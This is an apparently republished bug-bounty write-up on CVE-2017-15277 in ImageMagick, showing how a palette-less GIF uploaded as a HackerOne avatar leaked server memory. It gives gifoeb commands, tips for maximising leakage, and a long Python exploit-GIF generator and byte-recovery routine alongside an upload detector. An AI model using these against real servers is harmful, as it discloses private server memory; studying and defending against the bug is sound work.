Example Analysis of Server memory Information leakage caused by ImageMagick vulnerability on HackerOne platform

2025-02-23 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report

This is an example analysis of how an ImageMagick vulnerability leaked server memory on the HackerOne platform. Many readers will not know where to start with this class of bug, so this article summarises the cause of the problem and the fix; I hope it helps you deal with the same issue.

Hello, everyone. Today I would like to share a write-up of the ImageMagick GIF-processing vulnerability CVE-2017-15277 as it affected the HackerOne platform. The vulnerability itself is very simple.

Introduction to CVE-2017-15277

CVE-2017-15277 was first discovered by security researcher Emil Lerner in October 2017. It is a vulnerability in the open-source image-processing component ImageMagick; the affected software is ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26. The cause is that ReadGIFImage in coders/gif.c of those versions leaves the palette (colormap) uninitialised when it processes a GIF that has neither a global nor a local colour table. An attacker who gets a vulnerable server to process a crafted GIF of that kind can therefore read back, through the uninitialised palette, whatever data was left behind in that memory.

Put simply: if a server runs ImageMagick 7.0.6-1 or GraphicsMagick 1.3.26, an attacker can craft a palette-less GIF, upload it anywhere the server accepts uploads, and wait for the server to process it. Because the palette is never initialised, the server fills it from leftover memory and renders preview images at various resolutions in which each pixel's colour is really three bytes of that memory. The previews may therefore contain server memory contents such as stack fragments and string values.

In practical terms, ImageMagick is open-source software for displaying, converting and editing raster and vector image files. Many web applications use it for cropping, resizing and colour adjustment, and it supports a wide range of image formats.

Vulnerability exploitation

Let's go straight to exploitation. The target of the test here is the HackerOne website itself.

First, I downloaded the exploit package that Emil Lerner published on GitHub: https://github.com/neex/gifoeb

Next, generate a 512x512-pixel exploit GIF with the following command:

./gifoeb gen 512x512 dump.gif

You can also give the generated file another extension, such as .jpg, .tiff or .bmp, and you can generate exploit images at other resolutions:

Next, log in to a HackerOne account and upload the exploit GIF generated above as the profile picture:

Once the server backend has processed the exploit GIF, it generates a preview image at the corresponding 512x512 resolution.

I then generated GIF exploit images at several other resolutions and uploaded them one at a time, collecting the preview the server backend generated for each resolution:

Save these previews of different resolutions in one folder:

Finally, recover the server memory contained in the previews with the following command:

for p in previews/*; do ./gifoeb recover $p | strings; done

The previews at the different resolutions revealed runtime information from the server's memory, including server paths, the operating system, software versions and so on.
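To make the mechanism in the introduction concrete, and to show what the gen and recover steps above do in principle, here is an added example in Python. It is not code from the article and not gifoeb's implementation (I make no claim about gifoeb's exact file layout); the function names, the 128-code CLEAR interval and the assumption that the server's preview keeps 8-bit RGB without resampling are mine. It builds a GIF89a with neither a global nor a local colour table whose pixels cycle through all 256 indices, gives a defender the parser that flags exactly that condition on uploads, and maps a preview's pixels back to the 768 bytes that filled the missing colormap. Only a vulnerable ImageMagick actually leaks memory; offline, the file merely decodes to whatever palette the decoder substitutes.

```python
"""Added example (not the article's or gifoeb's code): build, inspect and
recover from a palette-less GIF of the kind that triggers CVE-2017-15277."""
import struct

CLEAR, EOI, MIN_CODE_SIZE = 256, 257, 8  # 8-bit indices, so 9-bit LZW codes


def _lzw_literal_stream(indices):
    """Pack pixel indices as 9-bit LZW codes with no compression.

    A CLEAR code is emitted every 128 codes, so the decoder's string table
    never reaches 512 entries and the code width stays at 9 bits throughout.
    Codes are packed least-significant-bit first, as the GIF spec requires.
    """
    bits = nbits = 0
    out = bytearray()

    def put(code):
        nonlocal bits, nbits
        bits |= code << nbits
        nbits += 9
        while nbits >= 8:
            out.append(bits & 0xFF)
            bits >>= 8
            nbits -= 8

    put(CLEAR)
    for i, idx in enumerate(indices):
        if i and i % 128 == 0:
            put(CLEAR)
        put(idx)
    put(EOI)
    if nbits:
        out.append(bits & 0xFF)
    # data sub-blocks of at most 255 bytes, followed by a zero-length terminator
    blocks = b"".join(bytes([len(out[i:i + 255])]) + bytes(out[i:i + 255])
                      for i in range(0, len(out), 255))
    return bytes([MIN_CODE_SIZE]) + blocks + b"\x00"


def build_paletteless_gif(width, height):
    """GIF89a with the global-colour-table flag clear and one frame that
    carries no local colour table; pixel i gets palette index i % 256."""
    # logical screen descriptor: packed byte 0x00 means no global colour table
    lsd = struct.pack("<HHBBB", width, height, 0x00, 0, 0)
    # image descriptor (0x2C): left, top, width, height, packed 0x00 = no local table
    idesc = b"\x2C" + struct.pack("<HHHHB", 0, 0, width, height, 0x00)
    pixels = [i % 256 for i in range(width * height)]
    return b"GIF89a" + lsd + idesc + _lzw_literal_stream(pixels) + b"\x3B"


def _skip_subblocks(data, pos):
    """Advance past a chain of length-prefixed sub-blocks ending in a 0 byte."""
    while data[pos]:
        pos += 1 + data[pos]
    return pos + 1


def inspect_gif(data):
    """Return (has_global_table, [has_local_table for each frame]).

    has_global_table False together with a False frame is the condition
    CVE-2017-15277 describes: pixels index a palette the file never defines."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]
    has_global = bool(packed & 0x80)
    pos = 13 + (3 * (2 << (packed & 0x07)) if has_global else 0)
    frames = []
    while pos < len(data):
        sep = data[pos]
        if sep == 0x3B:                      # trailer
            break
        if sep == 0x21:                      # extension: label byte, then sub-blocks
            pos = _skip_subblocks(data, pos + 2)
        elif sep == 0x2C:                    # image descriptor
            ipacked = data[pos + 9]
            has_local = bool(ipacked & 0x80)
            frames.append(has_local)
            pos += 10 + (3 * (2 << (ipacked & 0x07)) if has_local else 0)
            pos = _skip_subblocks(data, pos + 1)  # +1 skips the LZW minimum code size
        else:
            raise ValueError("unexpected block 0x%02x at offset %d" % (sep, pos))
    return has_global, frames


def is_paletteless(data):
    """True when the file would take the uninitialised-palette path."""
    has_global, frames = inspect_gif(data)
    return not has_global and any(not local for local in frames)


def recover_palette_bytes(preview_pixels):
    """Map a preview back to the 768 bytes that filled the missing colormap.

    preview_pixels: (r, g, b) tuples in raster order, as read from the
    server-generated preview. Because build_paletteless_gif gave pixel i the
    index i % 256, the first 256 pixels show colormap entries 0..255 in order,
    and each entry is three raw bytes of leaked memory. Assumption: the server
    kept 8 bits per channel and did not resample or recolour the image.
    """
    if len(preview_pixels) < 256:
        raise ValueError("need at least 256 pixels to read the whole colormap")
    return b"".join(bytes(px) for px in preview_pixels[:256])


if __name__ == "__main__":
    with open("dump.gif", "wb") as f:   # the counterpart of: ./gifoeb gen 512x512 dump.gif
        f.write(build_paletteless_gif(512, 512))
    print(inspect_gif(open("dump.gif", "rb").read()))   # prints (False, [False])
```

Run as a script it writes dump.gif and confirms the file has no colour table at all. The defender's side is inspect_gif: anything for which is_paletteless returns True deserves to be rejected or rendered only by a patched ImageMagick, since a decoder that honours the file has no choice but to invent the palette from somewhere. Pipe the bytes from recover_palette_bytes through strings exactly as the article does with gifoeb recover.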

Vulnerability impact

Exploiting CVE-2017-15277 may disclose server-side data such as e-mail, cookies, SQL queries and file paths. In the test above we found only HackerOne's operating system, file paths and some stack-trace-like fragments. The fix is, of course, to upgrade the ImageMagick component to the latest version.

Exploitation tips

1. The vulnerability has been mitigated and fixed in current ImageMagick releases. If you upload an exploit image to a patched server, you get only a black preview image, which discloses no server memory.

2. Even when you can retrieve the previews the server generates, check whether they actually leak server-related information such as file paths or the operating system version. If all you can see is stack-trace-like noise such as {{* a _ A _ a _ a ^ a; bb (b |}, keep testing and do not rush to report the vulnerability.

3. Generate exploit images at different resolutions and with different extensions. Previews that come out mostly grey tend to contain far more information than blue, green or red ones. How well this works ultimately depends on the target site and its ImageMagick version.
